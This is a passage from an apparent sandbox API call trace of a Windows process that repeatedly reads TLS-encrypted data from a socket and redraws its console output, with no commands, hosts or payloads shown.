lpBuffer=0x1e35146d810, lpReadRegion=0xb156f8d030) returned 1 [0156.935] CoTaskMemFree (pv=0x1e35146d810) [0156.935] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8cf68 | out: lpConsoleScreenBufferInfo=0xb156f8cf68) returned 1 [0156.936] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d158 | out: lpConsoleScreenBufferInfo=0xb156f8d158) returned 1 [0156.937] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0156.938] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8cff0 | out: lpWriteRegion=0xb156f8cff0) returned 1 [0156.939] CoTaskMemFree (pv=0x1e35146d810) [0156.939] setsockopt (s=0x898, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0156.940] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0156.941] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.046] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.047] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.047] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.047] CoTaskMemFree (pv=0x1e35146d810) [0157.048] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.048] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.125] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.126] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.126] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.126] CoTaskMemFree (pv=0x1e35146d810) [0157.127] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0157.127] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0157.127] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3394e76c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3394e76c8, pfQOP=0x0) returned 0x0 [0157.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.216] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.216] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.216] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.217] CoTaskMemFree (pv=0x1e35146d810) [0157.217] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.217] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.347] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.347] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.347] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.348] CoTaskMemFree (pv=0x1e35146d810) [0157.348] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0157.348] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0157.348] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3394f2240, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3394f2240, pfQOP=0x0) returned 0x0 [0157.348] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.348] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.425] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.426] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.426] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.426] CoTaskMemFree (pv=0x1e35146d810) [0157.426] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.427] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.503] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.504] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.504] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.505] CoTaskMemFree (pv=0x1e35146d810) [0157.505] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0157.505] recv (in: s=0x898, buf=0x1e3393bf4d5, len=13133, flags=0 | out: buf=0x1e3393bf4d5*) returned 13133 [0157.505] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339501bd8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339501bd8, pfQOP=0x0) returned 0x0 [0157.505] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.505] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.583] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.584] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.584] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.584] CoTaskMemFree (pv=0x1e35146d810) [0157.584] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.585] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.662] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.662] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.662] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.663] CoTaskMemFree (pv=0x1e35146d810) [0157.663] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0157.663] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0157.663] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33951b1b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33951b1b0, pfQOP=0x0) returned 0x0 [0157.663] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.663] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.797] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.798] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.798] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.798] CoTaskMemFree (pv=0x1e35146d810) [0157.799] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.799] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.881] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.882] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.882] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.883] CoTaskMemFree (pv=0x1e35146d810) [0157.883] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0157.883] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0157.883] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339520ef0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339520ef0, pfQOP=0x0) returned 0x0 [0157.883] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.883] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.971] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.972] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0157.972] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0157.972] CoTaskMemFree (pv=0x1e35146d810) [0157.973] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0157.973] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0157.973] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339523e80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339523e80, pfQOP=0x0) returned 0x0 [0157.973] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0157.974] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.203] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.203] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0158.204] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0158.204] CoTaskMemFree (pv=0x1e35146d810) [0158.208] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.208] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.291] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.292] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0158.292] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0158.292] CoTaskMemFree (pv=0x1e35146d810) [0158.292] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0158.292] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0158.292] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339529bc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339529bc0, pfQOP=0x0) returned 0x0 [0158.292] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.293] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.399] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0158.399] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0158.399] CoTaskMemFree (pv=0x1e35146d810) [0158.399] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0158.400] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0158.400] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33952cb50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33952cb50, pfQOP=0x0) returned 0x0 [0158.400] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.400] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.523] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.524] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0158.524] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0158.525] CoTaskMemFree (pv=0x1e35146d810) [0158.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.673] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.673] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0158.674] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0158.674] CoTaskMemFree (pv=0x1e35146d810) [0158.674] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0158.674] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0158.674] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339532890, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339532890, pfQOP=0x0) returned 0x0 [0158.674] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.675] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.752] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.753] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0158.754] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0158.754] CoTaskMemFree (pv=0x1e35146d810) [0158.754] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0158.754] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0158.754] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339535820, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339535820, pfQOP=0x0) returned 0x0 [0158.754] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.755] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.857] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.858] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0158.858] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0158.859] CoTaskMemFree (pv=0x1e35146d810) [0158.859] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.860] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.960] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.961] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0158.961] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0158.961] CoTaskMemFree (pv=0x1e35146d810) [0158.961] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0158.962] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0158.962] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33953b570, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33953b570, pfQOP=0x0) returned 0x0 [0158.962] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0158.962] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.166] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.167] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0159.167] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0159.168] CoTaskMemFree (pv=0x1e35146d810) [0159.168] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0159.168] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0159.168] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33953e508, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33953e508, pfQOP=0x0) returned 0x0 [0159.169] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.169] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.264] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.265] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0159.265] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0159.266] CoTaskMemFree (pv=0x1e35146d810) [0159.266] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.266] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.374] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0159.374] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0159.374] CoTaskMemFree (pv=0x1e35146d810) [0159.374] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0159.375] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0159.375] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339544258, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339544258, pfQOP=0x0) returned 0x0 [0159.375] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.375] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.479] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.479] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0159.479] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0159.480] CoTaskMemFree (pv=0x1e35146d810) [0159.480] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0159.480] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0159.481] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395471f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395471f0, pfQOP=0x0) returned 0x0 [0159.481] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.482] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, 